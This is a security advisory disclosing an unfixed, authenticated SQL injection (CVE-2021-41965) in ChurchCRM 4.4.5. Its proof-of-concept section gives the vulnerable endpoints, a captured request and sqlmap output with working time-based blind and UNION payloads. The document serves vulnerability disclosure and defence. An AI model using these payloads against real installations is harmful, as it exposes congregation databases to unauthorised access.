SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)

Sat, May 14, 2022
4-minute read

Summary

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
Product:                   Church Web CRM
Manufacturer:              ChurchCRM
Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
Tested Version(s):         4.4.5
Vulnerability Type:        SQL Injection (CWE-89) 
Risk Level:                High
Solution Status:           Unfixed
Manufacturer Notification: 2021-09-16
Solution Date:             n/a
Public Disclosure:         2022-05-14
CVE Reference:             CVE-2021-41965
Author of Advisory:        Alexander Bilz

Overview

The manufacturer describes the product as follows (see ¹):

“An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

Conduct Fundraisers
Manage Church Members
Publish Events
Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account ².

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

Vulnerability Details

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

Boolean-based blind
Time-based blind

The vulnerable functionality is only accessible when authenticated.

Proof of Concept (PoC)

As a proof of concept, the EN_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap ³.

Let’s start with the HTTP request I had captured in Burp Suite.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
POST /churchcrm/EditEventTypes.php HTTP/1.1  
Host: <IP>  
Content-Length: 21  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://<IP> 
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://<IP>/churchcrm/EventNames.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: <Cookie Value>  
Connection: close  
EN_tyid=4&Action=Edit

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~/ChurchCRM] 
└─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
        ___ 
       __H__                                                                  
 ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
|_ -| . [.]     | .'| . |                                                     
|___|_  [)]_|_|_|__,|  _|                                                     
      |_|V...       |_|   http://sqlmap.org                                   
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
[*] starting @ 10:42:27 /2021-09-16/ 
[10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
[10:42:28] [INFO] resuming back-end DBMS 'mysql'  
[10:42:28] [INFO] testing connection to the target URL 
sqlmap resumed the following injection point(s) from stored session: 
--- 
Parameter: EN_tyid (POST) 
    Type: time-based blind 
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
    Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
    Type: UNION query 
    Title: Generic UNION query (NULL) - 9 columns 
    Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
--- 
[10:42:29] [INFO] the back-end DBMS is MySQL 
web application technology: Apache 2.4.48, PHP 7.3.30 
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
[10:42:29] [INFO] fetching database names 
[10:42:31] [INFO] retrieved: 'information_schema' 
[10:42:32] [INFO] retrieved: 'test' 
[10:42:33] [INFO] retrieved: 'churchcrm' 
available databases [3]:                                                     
[*] churchcrm 
[*] information_schema 
[*] test 
[10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
[*] ending @ 10:42:33 /2021-09-16/

Disclosure Timeline

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

2021-09-16: Vulnerability discovered
2021-09-16: Vulnerability reported to the manufacturer
2022-05-02: CVE has been reserved
2022-05-14: Public disclosure of the vulnerability

Credits

This security vulnerability was found by Alexander Bilz.

E-Mail: mail[at]alexbilz.com
Public Key: https://www.alexbilz.com/ABilz.asc
Key ID: 0X474CECFD3DBC6880
Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

Disclaimer

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

References

Product website for ChurchCRM http://churchcrm.io/ ↩︎
ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
Link to sqlmap https://sqlmap.org/ ↩︎

Advisories SQLi sqlmap ChurchCRM CVE-2021-41965